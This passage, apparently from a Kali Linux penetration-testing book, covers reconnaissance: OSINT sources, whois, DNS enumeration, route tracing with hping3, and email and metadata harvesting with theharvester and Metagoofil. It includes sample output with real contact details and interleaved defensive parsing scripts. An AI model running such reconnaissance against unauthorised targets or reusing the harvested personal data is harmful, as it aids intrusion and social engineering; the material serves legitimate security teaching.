(www.exploit-db.com/google-dorks/). Most search engines have since 
released APIs to facilitate automated lookups, making tools such as Maltego 
particularly effective. 

One of the most effective search engines is Yandex (www.yandex.com). 
This Russian language search engine, the fourth-largest 
search engine in the world, allows users to search in several 
languages, including English. It also supports very granular search 
expressions, making it more effective than Google when searching 
for specific information. 

Other online sources that should be searched include: 

• Government, financial, or other regulatory sites that provide information 
on mergers and acquisitions, names of key persons, and supporting data 

• Usenet newsgroups, particularly postings from the target's employees 
looking for help with particular technologies 

• LinkedIn, Jigsaw, and other websites that provide employee information 

• Job search websites, especially ones for technical positions that provide 
a list of the technologies and services that must be supported by a 
successful applicant 

• Historic or cached content, retrieved by search engines (cache:url in Google, 
or WayBack Machine at www.archive.org) 
• Country- and language-specific social and business related sites (refer to 
http://searchenginecolossus.com) 

• Sites that aggregate and compare results from multiple search engines, 
such as Zuula (www.zuula.com) 

• Corporate and employee blogs, as well as personal blogs of key employees 

• Social networks (LinkedIn, Facebook, and Twitter) 

• Sites that provide lookups of DNS, route, and server information, especially 
DNSstuff (www.dnsstuff.com), ServerSniff (www.serversniff.net), 
Netcraft (www.netcraft.com), and myIPneighbors.com 

• Shodan (www.shodanHQ.com), sometimes referred to as the "hacker's Google"; 
Shodan lists Internet-accessible devices and allows the tester to search for 
devices with known vulnerabilities 

• Password dumpsites (pastebin, search using site:pastebin.com 
"targetURL") 

Managing findings can be difficult; however, Kali comes with KeepNote, which 
supports the rapid import and management of different types of data. 

DNS reconnaissance and route mapping 

Once a tester has identified the targets that have an online presence and contain 
items of interest, the next step is to identify the IP addresses and routes to the target. 

DNS reconnaissance is concerned with identifying who owns a particular domain or 
series of IP addresses (whois-type information), the DNS information defining the 
actual domain names and IP addresses assigned to the target, and the route between 
the penetration tester or the attacker and the final target. 

This information gathering is semi-active — some of the information is available from 
freely available open sources, while other information is available from third parties 
such as DNS registrars. Although the registrar may collect IP addresses and data 
concerning requests made by the attacker, it is rarely provided to the end target. The 
information that could be directly monitored by the target, such as DNS server logs, 
is almost never reviewed or retained. 

Because the information needed can be queried using a defined systematic and 
methodical approach, its collection can be automated. 
Note that DNS information may contain stale or incorrect entries. 

To minimize inaccurate information, query different source servers 
and use different tools to cross-validate results. Review results, and 
manually verify any suspect findings. Use a script to automate the 
collection of this information. The script should create a folder for 
the penetration test, and then a series of folders for each application 
being run. After the script executes each command, pipe the results 
directly to the specific holding folder. 
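The collection script the note above describes, as an added example in Python (not code from the book): it creates the engagement folder, one subfolder per tool, runs each command, and keeps the output plus a manifest record there so that results from different tools can be cross-validated later. The tool names are the chapter's; the exact command-line flags and the folder layout are assumptions.

```python
"""Collect reconnaissance output into one folder tree per engagement.

Added example (not code from the book): for every tool named in TOOLS it
creates <engagement>/<tool>/, saves stdout and stderr there, and appends one
JSON record per run to manifest.jsonl so results can be cross-validated later.
Tools that are not installed are recorded as "missing" instead of aborting.
"""
import json
import shutil
import subprocess
import tempfile
import time
from pathlib import Path

# One command line per tool; "{target}" is replaced with the domain under test.
# The tool names are the chapter's; the exact flags are assumptions.
TOOLS = {
    "whois": ["whois", "{target}"],
    "dnsrecon": ["dnsrecon", "-t", "std", "-d", "{target}"],
    "dnsenum": ["dnsenum", "{target}"],
    "fierce": ["fierce", "-dns", "{target}"],
    "traceroute": ["traceroute", "{target}"],
}


def run_tool(name, argv, target, out_dir, timeout=600):
    """Run one tool, keep its output under out_dir/<name>/, return a manifest record."""
    tool_dir = Path(out_dir) / name
    tool_dir.mkdir(parents=True, exist_ok=True)
    cmd = [arg.replace("{target}", target) for arg in argv]
    record = {
        "tool": name,
        "command": " ".join(cmd),
        "started": time.strftime("%Y-%m-%dT%H:%M:%S"),
        "out_dir": str(out_dir),
    }
    if shutil.which(cmd[0]) is None:
        record["status"] = "missing"   # note it and move on to the next tool
        return record
    try:
        proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        record["status"] = "timeout"
        return record
    (tool_dir / "stdout.txt").write_text(proc.stdout)
    (tool_dir / "stderr.txt").write_text(proc.stderr)
    record["status"] = "ok" if proc.returncode == 0 else f"exit {proc.returncode}"
    record["stdout_bytes"] = len(proc.stdout)
    return record


def collect(engagement_dir, target, tools=TOOLS):
    """Create the engagement folder (a temporary one if None), run every tool,
    append the records to manifest.jsonl and return them."""
    if engagement_dir is None:
        engagement_dir = tempfile.mkdtemp(prefix="recon-")
    out_dir = Path(engagement_dir)
    out_dir.mkdir(parents=True, exist_ok=True)
    records = [run_tool(name, argv, target, out_dir) for name, argv in tools.items()]
    with open(out_dir / "manifest.jsonl", "a") as fh:
        for rec in records:
            fh.write(json.dumps(rec) + "\n")
    return records


def read_output(engagement_dir, tool):
    """Return the saved stdout of one tool run."""
    return (Path(engagement_dir) / tool / "stdout.txt").read_text()


def read_manifest(engagement_dir):
    """Return every manifest record written for the engagement."""
    path = Path(engagement_dir) / "manifest.jsonl"
    return [json.loads(line) for line in path.read_text().splitlines() if line]


if __name__ == "__main__":
    import sys
    for rec in collect(sys.argv[1], sys.argv[2]):
        print(rec["tool"], rec["status"])
```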



WHOIS 

The first step in researching the IP address space is to identify the addresses that 
are assigned to the target site. This is usually accomplished by using the whois 
command, which allows people to query databases that store information on the 
registered users of an Internet resource, such as a domain name or IP address. 

Depending on the database that is queried, the response to a whois request will 
provide names, physical addresses, phone numbers, and e-mail addresses (useful in 
facilitating social engineering attacks), as well as IP addresses and DNS server names. 

An attacker can use information from a whois query to: 

• Support a social engineering attack against the location or persons identified 
in the query 

• Identify a location for a physical attack 

• Identify phone numbers that can be used for a war dialing attack, or to 
conduct a social engineering attack 

• Conduct recursive searches to locate other domains hosted on the same 
server as the target or operated by the same user; if they are insecure, an 
attacker can exploit them to gain administrative access to the server, and then 
compromise the target server 

• In cases where the domain is due to expire, an attacker can attempt to seize 
the domain, and create a look-alike website to compromise visitors who 
think they are on the original website 

• An attacker will use the authoritative DNS servers, which hold the records 
for lookups of that domain, to facilitate DNS reconnaissance 
Note that there is an increase in the usage of third parties to shield this data, and 
some domains, such as .gov and .mil, may not be accessible to the public domain. 
Requests to these domains are usually logged. There are several online lists available 
that describe domains and IP addresses assigned for government use; most tools 
accept options for "no contact" addresses, and government domains should be 
entered into these fields to avoid the wrong type of attention! 

The easiest way to issue a whois query is from the command line. The following 
screenshot shows the whois command run against the domain of Digital Defence: 



root@kali:~# whois digitaldefence.ca 

Domain name:           digitaldefence.ca 
Domain status:         registered 
Creation date:         2002/06/10 
Expiry date:           2016/06/10 
Updated date:          2011/05/31 

Registrar: 
    Name:              Tucows.com Co. 
    Number:            156 

Registrant: 
    Name:              DigitalDefence, Inc 

Administrative contact: 
    Name:              Robert W. Beggs 
    Postal address:    302-3310 South Service Road 
                       Burlington ON L7N 3M6 Canada 
    Phone:             905-681-3310 
    Fax:               416-644-8801 
    Email:             robert.beggs@digitaldefence.ca 

Technical contact: 
    Name:              Robert W. Beggs 
    Postal address:    302-3310 South Service Road 
                       Burlington ON L7N 3M6 Canada 
    Phone:             905-681-3310 
    Fax:               416-644-8801 
    Email:             robert.beggs@digitaldefence.ca 

Name servers: 
    ns03.businesscatalyst.com 
    ns01.businesscatalyst.com 


The returned whois record contains geographical information, names, and contact 
information — all of which can be used to facilitate a social engineering attack. 

There are several websites that automate whois lookup enquiries, and attackers can 
use these sites to insert a step between the target and themselves; however, the site 
doing the lookup may log the requester's IP address. 
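An added example (not the book's code) that parses whois output in the key/value layout shown above and reports what a defender should watch in their own record: how close the expiry date is, which contact details are exposed to social engineering, and the authoritative name servers. SAMPLE_WHOIS is a constructed record in the same layout.

```python
"""Parse whois output in the .ca registry layout and summarise the exposure.
Added example, not the book's code; SAMPLE_WHOIS is a constructed record."""
from datetime import datetime
import re

SAMPLE_WHOIS = """\
Domain name:           example.ca
Domain status:         registered
Creation date:         2002/06/10
Expiry date:           2016/06/10
Updated date:          2011/05/31

Registrar:
    Name:              Example Registrar Co.
    Number:            156

Administrative contact:
    Name:              Jane Doe
    Phone:             555-0100
    Email:             jane.doe@example.ca

Technical contact:
    Name:              Jane Doe
    Phone:             555-0100
    Email:             jane.doe@example.ca

Name servers:
    ns01.example.net
    ns03.example.net
"""

KEY_VALUE = re.compile(r"^([A-Za-z ]+):\s*(.*)$")


def parse_whois(text):
    """Return the top-level fields, contact e-mails/phones and name servers."""
    info = {"fields": {}, "emails": set(), "phones": set(), "name_servers": []}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        indented = raw[0].isspace()
        if not indented and line.endswith(":"):
            section = line[:-1]           # "Registrar", "Name servers", ...
            continue
        m = KEY_VALUE.match(line)
        if m:
            key, value = m.group(1).strip().lower(), m.group(2).strip()
            if not indented:
                info["fields"][key] = value   # Domain name, Expiry date, ...
            elif key == "email":
                info["emails"].add(value)
            elif key == "phone":
                info["phones"].add(value)
        elif section == "Name servers":
            info["name_servers"].append(line)
    return info


def days_to_expiry(info, today):
    """Days from today (YYYY/MM/DD) until registration lapses; negative once expired."""
    fmt = "%Y/%m/%d"
    expiry = datetime.strptime(info["fields"]["expiry date"], fmt)
    return (expiry - datetime.strptime(today, fmt)).days


def exposure_report(info, today):
    """A defender's summary: is renewal due, and which contact details are public."""
    days = days_to_expiry(info, today)
    return {
        "domain": info["fields"].get("domain name"),
        "days_to_expiry": days,
        "renewal_needed": days <= 60,        # threshold is an assumption
        "public_emails": sorted(info["emails"]),
        "public_phones": sorted(info["phones"]),
        "authoritative_ns": info["name_servers"],
    }
```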
DNS reconnaissance 

The Domain Name System (DNS) is a distributed database that resolves names 
(www.digitaldefence.ca) to IP addresses (192.150.2.140). 

Attackers use the DNS information in the following ways: 

• Brute-force attacks allow attackers to identify new domain names 
associated with the target. 

• If the DNS server is configured to permit a zone transfer to any requester, 
it will provide hostnames and IP addresses of Internet-accessible systems, 
making it easier to identify potential targets. If the target does not segregate 
public (external) DNS information from private (internal) DNS information, 
a zone transfer might disclose the hostnames and IP addresses of internal 
devices. (Note that most IDS and IPS systems will trigger an alarm if a zone 
transfer request is triggered). 

• Finding services that may be vulnerable (for example, FTP) or are otherwise 
interesting (remote administration panels and remote access). 

• Finding misconfigured and/or unpatched servers 
(dbase.test.target.com). 

• Service records (SRV) provide information on service, transport, port, 
and order of importance for services. This can allow an attacker to deduce 
the software. 

• DomainKeys Identified Mail (DKIM) and Sender Policy Framework (SPF) 
records are used to control spam e-mails. If these records are identified, the 
attacker knows that: 

° They are more security conscious than most organizations. 

° This may impact phishing and other social engineering attacks. 

Both Windows and Unix support basic command-line tools such as nslookup, and 
Unix systems support additional command-line options such as dig. Unfortunately, 
these commands usually interrogate one server at a time, and require interactive 
responses to be effective. 

Kali features several tools designed to iteratively query DNS information for a 
particular target. The selected tool must accommodate the Internet Protocol version 
that is used for communications with the target — IPv4 or IPv6. 







Chapter 2 



IPv4 

The IP, or Internet Protocol address, is a unique number used to identify devices 
that are connected to a private network or the public Internet. Today, the Internet 
is largely based on version 4, IPv4. Kali includes several tools to facilitate DNS 
reconnaissance, as given in the following table: 



Application                      Description 

dnsenum, dnsmap, and dnsrecon    These are comprehensive DNS scanners — DNS 
                                 record enumeration (A, MX, TXT, SOA, wildcard, 
                                 and so on), subdomain brute-force attacks, Google 
                                 lookup, reverse lookup, zone transfer, and zone 
                                 walking. dnsrecon is usually the first choice — it is 
                                 highly reliable, results are well parsed, and data can 
                                 be directly imported into the Metasploit Framework. 

dnstracer                        This determines where a given Domain Name System 
                                 gets its information from, and follows the chain of 
                                 DNS servers back to the servers which know the data. 

dnswalk                          This DNS debugger checks specified domains for 
                                 internal consistency and accuracy. 

fierce                           This locates non-contiguous IP space and hostnames 
                                 against specified domains by attempting zone 
                                 transfers, and then attempting brute-force attacks to 
                                 gain DNS information. 


During testing, most investigators run fierce to confirm that all possible targets 
have been identified, and then run at least two comprehensive tools (for example, 
dnsenum and dnsrecon) to generate the maximum amount of data and provide a 
degree of cross validation. 
In the following screenshot, dnsrecon is used to generate a standard DNS record 
search, and a search that is specific for SRV records. An excerpt of the results is 
shown for each case. 



root@kali:~# dnsrecon -t std -d google.com 
[*] Performing General Enumeration of Domain: google.com 
[-] DNSSEC is not configured for google.com 
[*]      SOA ns1.google.com 216.239.32.16 
[*]      NS ns3.google.com 216.239.36.16 
[*]      NS ns2.google.com 216.239.34.16 
[*]      NS ns4.google.com 216.239.38.16 
[*]      NS ns1.google.com 216.239.32.16 
[*]      MX alt2.aspmx.l.google.com 74.125.131.27 
[*]      MX alt1.aspmx.l.google.com 173.194.76.27 
[*]      MX alt3.aspmx.l.google.com 173.194.66.27 
[*]      MX alt4.aspmx.l.google.com 74.125.136.26 
[*]      MX aspmx.l.google.com 74.125.142.27 
[*]      MX alt2.aspmx.l.google.com 2667:f8b6:466c:c61 
[*]      MX alt1.aspmx.l.google.com 2667:f8b6:466d:c62 
[*]      MX alt3.aspmx.l.google.com 2a66:1456:466c:c66 
[*]      MX alt4.aspmx.l.google.com 2a66:1456:4613:c66 
[*]      MX aspmx.l.google.com 2667:f8b6:466d:c62::1a 
[*]      A google.com 173.194.43.72 
[*]      A google.com 173.194.43.64 
[*]      A google.com 173.194.43.66 
[*]      A google.com 173.194.43.76 
[*]      A google.com 173.194.43.78 
[*]      A google.com 173.194.43.67 
[*]      A google.com 173.194.43.68 
[*]      A google.com 173.194.43.71 
[*]      A google.com 173.194.43.73 
[*]      A google.com 173.194.43.69 
[*]      A google.com 173.194.43.65 
[*]      AAAA google.com 2667:f8b6:466b:866::1669 


DNSrecon allows the penetration tester to obtain the SOA record, name servers (NS), 
mail exchanger (MX) hosts, servers sending e-mails using Sender Policy Framework 
(SPF), and the IP address ranges in use. 
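An added example (not the book's or dnsrecon's code) that reads dnsrecon's line format and produces the summary described above, applying the checks a defender would run against their own zone: whether DNSSEC is configured, how strict the SPF policy is, which services SRV records advertise, and which hosts and IPv4 networks are exposed. SAMPLE_OUTPUT is constructed in dnsrecon's format.

```python
"""Summarise dnsrecon '-t std' output: records, exposed hosts and networks, and
the hygiene signals the chapter mentions (DNSSEC, SPF strictness, SRV records).
Added example, not the book's or dnsrecon's code; SAMPLE_OUTPUT is constructed."""
import ipaddress
import re
from collections import defaultdict

SAMPLE_OUTPUT = """\
[*] Performing General Enumeration of Domain: example.com
[-] DNSSEC is not configured for example.com
[*]      SOA ns1.example.com 203.0.113.16
[*]      NS ns1.example.com 203.0.113.16
[*]      NS ns2.example.com 203.0.113.80
[*]      MX mail.example.com 198.51.100.27
[*]      A example.com 198.51.100.72
[*]      A example.com 198.51.100.64
[*]      AAAA example.com 2001:db8:4006:806::1009
[*]      TXT example.com v=spf1 include:_spf.example.com ~all
[*]      SRV _sip._tcp.example.com sip.example.com 198.51.100.5 5060 10
"""

RECORD_LINE = re.compile(r"^\[(?P<tag>[-*+!])\]\s+(?P<type>[A-Z]+)\s+(?P<rest>.+)$")


def parse_dnsrecon(text):
    """Return ({record_type: [fields, ...]}, [notes]) from dnsrecon's output."""
    records, notes = defaultdict(list), []
    for line in text.splitlines():
        m = RECORD_LINE.match(line)
        if m is None:
            continue
        if m.group("tag") == "-":             # informational / negative result
            notes.append(m.group("type") + " " + m.group("rest"))
        else:
            records[m.group("type")].append(m.group("rest").split())
    return records, notes


def spf_policy(txt_records):
    """Classify the SPF record by its final 'all' mechanism, or None if absent."""
    for fields in txt_records:
        if len(fields) > 1 and fields[1].lower() == "v=spf1":
            last = fields[-1].lower()
            return {"-all": "hard fail", "~all": "soft fail", "?all": "neutral",
                    "+all": "permissive", "all": "permissive"}.get(last, "no all mechanism")
    return None


def summarize(text):
    """The defender's view of a dnsrecon run: exposure plus hygiene signals."""
    records, notes = parse_dnsrecon(text)
    addresses = set()
    for rtype in ("SOA", "NS", "MX", "A"):      # last field of these is an address
        for fields in records.get(rtype, []):
            try:
                addresses.add(ipaddress.ip_address(fields[-1]))
            except ValueError:
                pass
    networks = {str(ipaddress.ip_network(f"{ip}/24", strict=False))
                for ip in addresses if ip.version == 4}
    hosts = {fields[0] for rtype in ("A", "AAAA", "NS", "MX")
             for fields in records.get(rtype, [])}
    return {
        "dnssec": not any(n.startswith("DNSSEC is not configured") for n in notes),
        "spf": spf_policy(records.get("TXT", [])),
        "srv_services": [fields[0] for fields in records.get("SRV", [])],
        "ipv4_networks": sorted(networks),
        "hosts": sorted(hosts),
        "record_counts": {rtype: len(v) for rtype, v in sorted(records.items())},
    }
```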
IPv6 

Although IPv4 seems to permit a large address space, freely available IP addresses 
were exhausted several years ago, forcing the employment of NAT and DHCP to 
increase the number of available addresses. A more permanent solution has been 
found in the adoption of an improved IP addressing scheme, IPv6. Although it 
constitutes less than five percent of Internet addresses, its usage is increasing, and 
penetration testers must be prepared to address the differences between IPv4 and IPv6. 

In IPv6, the source and destination addresses are 128 bits in length, yielding 2^128 
possible addresses, that is, 340 undecillion addresses! 

The increased size of the addressable address space presents some problems 
to penetration testers, particularly when using scanners that step through the 
available address space looking for live servers. However, some features of the 
IPv6 protocol have simplified discovery, especially the use of ICMPv6 to identify 
active link-local addresses. 

It is important to consider IPv6 when conducting initial scans for the 
following reasons: 

• There is uneven support for IPv6 functionality in testing tools, so the tester 
must ensure that each tool is validated to determine its performance and 
accuracy in IPv4, IPv6, and mixed networks. 

• Because IPv6 is a relatively new protocol, the target network may contain 
misconfigurations that leak important data; the tester must be prepared to 
recognize and use this information. 

• Older network controls (firewalls, IDS, and IPS) may not detect IPv6. 
In such cases, penetration testers can use IPv6 tunnels to maintain covert 
communications with the network, and exfiltrate the data undetected. 

Kali includes several tools developed to take advantage of IPv6 (most comprehensive 
scanners, such as nmap, now support IPv6), some of which are as follows; tools that 
are particular to IPv6 were largely derived from the THC-IPv6 Attack Toolkit. 



Application    Description 

dnsdict6       Enumerates subdomains to obtain IPv4 and IPv6 addresses (if present) 
               using a brute force search based on a supplied dictionary file or its own 
               internal list. 

dnsrevenum6    Performs reverse DNS enumeration given an IPv6 address. 

The execution of the dnsdict6 command is shown in the following screenshot: 

root@kali:~# dnsdict6 google.com 
Starting DNS enumeration work on google.com. ... 
Starting enumerating google.com. - creating 8 threads for 798 words... 
Estimated time to completion: 1 to 2 minutes 
www.google.com. => 2607:f8b0:400b:807::1012 
ipv6.google.com. => 2607:f8b0:400b:80b::1012 
mail.google.com. => 2607:f8b0:400b:806::1016 
blog.google.com. => 2607:f8b0:4001:c00::bf 



Mapping the route to the target 

Route mapping was originally used as a diagnostic tool that allows you to view 
the route that an IP packet follows from one host to the next. It relies on the 
time to live (TTL) field in the IP header: each router along the path decrements 
the TTL by 1, and the router at which it reaches zero returns an ICMP 
TIME_EXCEEDED message. By sending probes with an increasing initial TTL, the 
tool counts the hops and reveals the route taken. 

From an attacker's, or penetration tester's perspective, the traceroute data yields 
the following important data: 

• The exact path between the attacker and the target 

• Hints pertaining to the network's external topology 

• Identification of access control devices (firewalls and 
packet-filtering routers) that may be filtering attack traffic 

• If the network is misconfigured, it may be possible to identify 
internal addressing 




Using a web-based traceroute (www . traceroute . org), it is 
possible to trace various geographic origin sites to the target network. 
These types of scans will frequently identify more than one different 
network connecting to the target, which is information that could be 
missed by conducting only a single traceroute from a location close 
to the target. Web-based traceroute may also identify multihomed 
hosts which connect two or more networks together. These hosts are 
an important target for attackers, because they drastically increase the 
attack surface leading to the target. 
In Kali, traceroute is a command-line program that uses ICMP packets to map the 
route; in Windows, the program is tracert. 

If you launch traceroute from Kali, it is likely that you will see most hops filtered 
(data is shown as * * *). For example, traceroute from the author's present location 
to www.google.com would yield the following: 

root@kali:~# traceroute www.google.com 
traceroute to www.google.com (24.226.16.35), 30 hops max, 60 byte packets 
 1  192.168.117.2 (192.168.117.2)  6.179 ms  6.167 ms  6.699 ms 
 2  * * * 
 3  * * * 



However, if the same request was run using tracert from the Windows command 
line, we would see the following: 



C:\>tracert 24.226.16.35 

Tracing route to cache.googlevideo.com [24.226.16.35] 
over a maximum of 30 hops: 

  1    <1 ms    <1 ms    <1 ms  192.168.1.1 
  2    13 ms     7 ms     1 ms  s72-38-69-141.static.conn.cgocable.net [72.38.69.141] 
  3    21 ms    31 ms    29 ms  10.64.232.1 
  4   164 ms   159 ms   210 ms  d226-8-197.home.cgocable.net [24.226.8.197] 
  5    95 ms    98 ms    95 ms  cgowave-busy3-ubr.cgocable.net [24.226.6.133] 
  6    12 ms    12 ms    14 ms  cache.googlevideo.com [24.226.16.35] 

Trace complete. 



Not only do we get the complete path, but we can also see that www.google.com is 
resolving to a slightly different IP address, indicating that load balancers are in effect 
(you can confirm this using Kali's lbd script; however, this activity may be logged by 
the target site). 

The reason for the different path data is that, by default, traceroute uses UDP 
datagrams while Windows tracert uses ICMP echo requests (ICMP type 8). 
Therefore, when completing a traceroute using Kali tools, it is important to use 
multiple protocols in order to obtain the most complete path, and to bypass 
packet-filtering devices. 
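An added example (not the book's code) that parses both output formats shown above and compares a UDP traceroute with an ICMP trace of the same destination hop by hop: it lists the hops that only the ICMP probes reached and flags any RFC 1918 address that leaks from the path, which is the internal-addressing misconfiguration the chapter warns about. Both captures are constructed in the traceroute and tracert formats.

```python
"""Compare a UDP traceroute (Kali default) with an ICMP echo trace (Windows
tracert, or traceroute -I) of the same destination. Added example, not the
book's code; SAMPLE_TRACEROUTE and SAMPLE_TRACERT are constructed captures."""
import ipaddress
import re

SAMPLE_TRACEROUTE = """\
traceroute to www.example.com (203.0.113.35), 30 hops max, 60 byte packets
 1  192.168.1.1 (192.168.1.1)  6.179 ms  6.167 ms  6.699 ms
 2  * * *
 3  * * *
 4  * * *
"""

SAMPLE_TRACERT = """\
Tracing route to cache.example.net [203.0.113.35]
over a maximum of 30 hops:

  1    <1 ms    <1 ms    <1 ms  192.168.1.1
  2    13 ms     7 ms     1 ms  gw-141.isp.example.net [198.51.100.141]
  3    21 ms    31 ms    29 ms  10.64.232.1
  4   164 ms   159 ms   210 ms  cache.example.net [203.0.113.35]

Trace complete.
"""

HOP_RE = re.compile(r"^\s*(\d+)\s+(.*)$")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
RTT_RE = re.compile(r"<?(\d+(?:\.\d+)?)\s*ms")
DEST_RE = re.compile(r"(?:traceroute to|Tracing route to)\s+(\S+)\s+[\(\[]([^)\]]+)[)\]]")
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_trace(text):
    """Parse traceroute or tracert output into {'dest_name', 'dest_ip', 'hops'}."""
    result = {"dest_name": None, "dest_ip": None, "hops": []}
    for line in text.splitlines():
        dest = DEST_RE.search(line)
        if dest:
            result["dest_name"], result["dest_ip"] = dest.group(1), dest.group(2)
            continue
        m = HOP_RE.match(line)
        if not m:
            continue
        rest = m.group(2)
        ips = IPV4_RE.findall(rest)
        result["hops"].append({
            "hop": int(m.group(1)),
            "ip": ips[0] if ips else None,           # first address on the line
            "rtt_ms": [float(x) for x in RTT_RE.findall(rest)],
            "filtered": not ips and "*" in rest,     # no reply from this hop
        })
    return result


def is_rfc1918(ip):
    """True for private (internal) IPv4 addressing that should not appear on a public path."""
    return any(ipaddress.ip_address(ip) in net for net in RFC1918)


def compare_traces(udp_text, icmp_text):
    """Merge the two traces hop by hop and report what each probe type showed."""
    udp, icmp = parse_trace(udp_text), parse_trace(icmp_text)
    revealed, internal = [], []
    for i in range(max(len(udp["hops"]), len(icmp["hops"]))):
        udp_ip = udp["hops"][i]["ip"] if i < len(udp["hops"]) else None
        icmp_ip = icmp["hops"][i]["ip"] if i < len(icmp["hops"]) else None
        if icmp_ip and not udp_ip:
            revealed.append(icmp_ip)               # filtered for UDP, answered for ICMP
        for ip in {udp_ip, icmp_ip} - {None}:
            if is_rfc1918(ip) and ip not in internal:
                internal.append(ip)
    return {
        "filtered_udp_hops": sum(h["filtered"] for h in udp["hops"]),
        "revealed_by_icmp": revealed,
        "internal_addresses": internal,
        "same_destination": udp["dest_ip"] == icmp["dest_ip"],
        "destination_names": (udp["dest_name"], icmp["dest_name"]),
    }
```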
Kali provides the following tools for completing route traces: 

Application    Description 

hping3         This is a TCP/IP packet assembler and analyzer. This supports TCP, 
               UDP, ICMP, and raw-IP and uses a ping-like interface. 

intrace        This enables users to enumerate IP hops by exploiting existing TCP 
               connections, both initiated from the local system or network, or from 
               local hosts. This makes it very useful for bypassing external filters 
               such as firewalls. intrace is a replacement for the less reliable 0trace 
               program. 

trace6         This is a traceroute program that uses ICMP6. 



hping3 is one of the most useful tools due to the control it gives over packet type, 
source packet, and destination packet. For example, Google does not allow ping 
requests. However, it is possible to ping the server if you send the packet as a TCP 
SYN request. 

In the following example, the tester attempts to ping Google from the command line. 
The returned data identifies that www.google.com is an unknown host; Google is 
clearly blocking ICMP-based ping commands. However, the next command invokes 
hping3, instructing it to do the following: 

1. Send a ping-like command to Google using TCP with the SYN flag set (-S). 

2. Direct the packet to port 80; legitimate requests of this type are rarely 
blocked (-p 80). 

3. Set a count of sending three packets to the target (-c 3). 
root@kali:~# ping www.google.com 
ping: unknown host www.google.com 
root@kali:~# hping3 -S www.google.com -p 80 -c 3 
HPING www.google.com (eth0 74.125.225.112): S set, 40 headers + 0 data bytes 
len=46 ip=74.125.225.112 ttl=56 id=10463 sport=80 flags=SA seq=0 win=42900 rtt=281.0 ms 
len=46 ip=74.125.225.112 ttl=56 id=44734 sport=80 flags=SA seq=1 win=42900 rtt=84.0 ms 
len=46 ip=74.125.225.112 ttl=56 id=26344 sport=80 flags=SA seq=2 win=42900 rtt=26.3 ms 

--- www.google.com hping statistic --- 
3 packets transmitted, 3 packets received, 0% packet loss 
round-trip min/avg/max = 26.3/130.5/281.0 ms 
root@kali:~# 



The hping3 command successfully identifies that the target is online, and provides 
some basic routing information. 

Obtaining user information 

Many penetration testers gather user names and e-mail addresses, as this 
information is frequently used to log on to targeted systems. 

The most commonly employed tool is the web browser, which is used to manually 
search the target organization's website as well as third-party sites such as LinkedIn 
or Jigsaw. 

Some automated tools included with Kali can supplement the manual searches. 




E-mail addresses of former employees can still be of use. When 
conducting social engineering attacks, directing information requests to 
a former employee usually results in a redirect that gives the attacker 
the "credibility" of having dealt with the previous employee. In addition, 
many organizations do not properly terminate employee accounts, and it 
is possible that these credentials may still give access to the target system. 
Gathering names and e-mail addresses 

The theharvester tool is a Python script that searches through popular search 
engines and other sites for e-mail addresses, hosts, and subdomains. 

Using theharvester is relatively simple as there are only a few command 
switches to set. The options available are: 

• -d: This identifies the domain to be searched; usually the domain or 
target's website. 

• -b: This identifies the source for extracting the data; it must be one of 
the following: 

Bing, BingAPI, Google, Google-Profiles, Jigsaw, LinkedIn, People123, PGP, 
or All 

• -l: This limit option instructs theharvester to only harvest data from a 
specified number of returned search results. 

• -f: This option is used to save the final results to an HTML and an XML file. 
If this option is omitted, the results will be displayed on the screen and 
not saved. 



The following screenshot shows the results of a simple search of the Google indexes 
for the domain digitaldefence.ca: 

root@kali:~# theharvester -d digitaldefence.ca -b google 

******************************************************************* 
*                                                                 * 
*  TheHarvester Ver. 2.2a                                         * 
*  Coded by Christian Martorella                                  * 
*  Edge-Security Research                                         * 
*  cmartorella@edge-security.com                                  * 
******************************************************************* 

[-] Searching in Google: 
Searching 0 results... 
Searching 100 results... 

[+] Emails found: 

robert.beggs@digitaldefence.ca 
careers@digitaldefence.ca 
csirt@digitaldefence.ca 
partners@digitaldefence.ca 
info@digitaldefence.ca 

[+] Hosts found in search engines: 

54.236.190.114:www.digitaldefence.ca 
Gathering document metadata 

Document metadata refers to the information that is appended to documents so that 
applications can manage them during the creation and storage processes. Examples 
of metadata typically attached to documents include the following: 

• The company or person who owns the application used to create 
the document 

• The name of the document's author 

• The time and date that the document was created 

• The date when the file was last printed or modified; in some cases, 
it will identify who made the modifications 

• The location on the computer network where the document was created 

• Some files, especially those created by cameras or mobile devices, may 
include geographic tags that identify where the image was created 

Metadata is not immediately visible to the end user, so most documents are 
published with the metadata intact. Unfortunately, this data leakage can reveal 
information that can be used by a tester or attacker to facilitate an attack. At a 
minimum, testers and attackers can harvest usernames from documents and identify 
the persons associated with particular data types, such as annual financial reports 
or strategic planning. 

As mobile devices become more common, the risks associated with geographical 
metadata have increased. Attackers look for locations (cottages, hotels, and 
restaurants that are frequently visited) as sites that may allow them to launch attacks 
against users who have let their guard down outside the corporate perimeter. For 
example, if an employee of the target organization regularly posts pictures to a 
social media website while waiting for a commuter train, an attacker may target that 
employee for a physical attack (theft of the mobile device), wireless attack, or even 
peek over the victim's shoulder to note the username and password. 
On Kali, the tool Metagoofil performs a Google search to identify and download 
a target website's documents (doc, docx, pdf, pptx, xls, and xlsx) and extract 
usernames, software versions, storage path names, and server or workstation 
names, as shown in the following screenshot: 



root@kali:~# metagoofil -d microsoft.com -t doc -l 25 -o microsoft -f microsoft.html 
[Metagoofil banner: Ver 2.2, Christian Martorella, Edge-Security.com, 
 cmartorella_at_edge-security.com] 

[-] Starting online search... 
[-] Searching for doc files, with a limit of 25 
Searching 100 results... 
Results: 102 files found 
Starting to download 50 of them: 

[1/50] /webhp?hl=en 
[x] Error downloading /webhp?hl=en 
[2/50] http://download.microsoft.com/documents/customerevidence/9930_Planet_Pret Frees Sandwich Chain fr.doc 



Metagoofil downloads the specified number of documents to a temporary folder, 
and extracts and organizes the relevant metadata. It also performs this function 
against files that have previously been downloaded and are now stored locally. 

One of the first returns of Metagoofil is a list of the users that are found. 

The following is a screenshot of a truncated list: 

[+] List of users found: 



Michael Grimm, Microsoft Corp. 

IT Pro Marketing 

May Yee 

sarah condon 

Michael Royster 
Metagoofil also identifies servers and pathnames of the documents. If certain 
documents of interest are localized with a particular user (for example, drafts of 
financial reports found on an administrative assistant's workstation), that system 
can be targeted later during testing, as shown in the following screenshot: 

